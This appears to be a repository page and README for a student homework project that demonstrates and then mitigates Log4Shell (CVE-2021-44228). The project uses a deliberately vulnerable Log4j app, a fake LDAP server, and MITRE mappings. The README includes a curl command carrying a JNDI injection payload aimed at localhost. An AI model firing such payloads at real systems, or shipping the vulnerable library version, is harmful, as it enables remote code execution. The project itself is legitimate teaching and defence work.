CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Source

Associated Vulnerability

Description

Log4Shell (CVE-2021-44228) exploit demo for SEAS 8405. Includes a vulnerable Spring Boot app, fake LDAP server, Docker setup, MITRE mapping, incident response, and a full screen recording.

Readme

# Homework 9 – Securing Systems Against Log4Shell Exploits

## Overview

This project demonstrates the exploitation and mitigation of the Log4Shell vulnerability (CVE-2021-44228) using a Dockerized Java web application with vulnerable Log4j 2.14.1. The setup also includes a simulated malicious LDAP server to demonstrate the JNDI injection attack path.

After exploitation, the system is hardened by upgrading Log4j, validating input, and applying MITRE D3FEND and ATT&CK recommendations.

---

##  Folder Structure

```
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf
```

---

##  How to Run

### 1. Build the Java App (with vulnerable Log4j)

```bash
docker build -t vulnerable-app .
```

### 2. Run the App with Docker Compose

```bash
docker-compose up
```

App will be running at:  
http://localhost:8080

### 3. Start the Fake LDAP Server (in a new terminal)

```bash
python3 ldap_server.py
```

### 4. Simulate an Exploit

Send a request like this to the app:

```bash
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}
```

The LDAP server should receive the request (this simulates the JNDI exploit).

---

##  How It’s Hardened

After demonstrating the attack, the system was secured by:

-  Upgrading Log4j to version 2.17.0
-  Input validation (blocking `${jndi:...}` patterns)
-  Disabling message lookups in configuration
-  Docker isolation to limit scope
-  MITRE D3FEND & ATT&CK techniques applied

---

## MITRE Mapping

### MITRE ATT&CK:
- T1190: Exploit Public-Facing Application
- T1210: Exploitation of Remote Services

### MITRE D3FEND:
- D3-IA: Input Validation
- D3-HI: Host-based Intrusion Detection
- D3-DA: Disable Unsafe Features

---

## Report

See `mitigation_report.pdf` for:
- System architecture before/after
- Explanation of Log4Shell
- Mitigation strategy
- Incident response plan

---

## Screen Recording

If the video is not uploaded directly, it is available at the link in the report.

---

## Author

**Serpil Rivas**  
SEAS 8405 – Cybersecurity Architectures  
May 2025

File Snapshot

 [4.0K]  /data/pocs/3f55c353215d113e70869425385dc2e9b3d45bc2
├── [1.3M]  Architecture-Diagram.png
├── [ 135]  docker-compose.yml
├── [ 244]  Dockerfile
├── [ 613]  ldap_server.py
├── [1.6K]  pom.xml
├── [2.2K]  README.md
├── [2.0M]  Rivas_SEAS8405_Assignment_9_Report.pdf
├── [4.0K]  Screenshots
│   ├── [114K]  Screen1.png
│   ├── [147K]  screen2.png
│   ├── [139K]  screen3.png
│   └── [192K]  Screen 4.png
├── [4.0K]  src
│   └── [4.0K]  main
│       └── [4.0K]  java
│           └── [4.0K]  com
│               └── [4.0K]  example
│                   ├── [ 328]  Log4ShellDemoApplication.java
│                   └── [ 567]  LogController.java
└── [4.0K]  target
    ├── [4.0K]  classes
    │   └── [4.0K]  com
    │       └── [4.0K]  example
    │           ├── [ 750]  Log4ShellDemoApplication.class
    │           └── [1.5K]  LogController.class
    ├── [ 18M]  log4shell-demo-0.0.1-SNAPSHOT.jar
    ├── [3.2K]  log4shell-demo-0.0.1-SNAPSHOT.jar.original
    ├── [4.0K]  maven-archiver
    │   └── [  69]  pom.properties
    └── [4.0K]  maven-status
        └── [4.0K]  maven-compiler-plugin
            └── [4.0K]  compile
                └── [4.0K]  default-compile
                    ├── [  75]  createdFiles.lst
                    └── [ 193]  inputFiles.lst

15 directories, 20 files

Remarks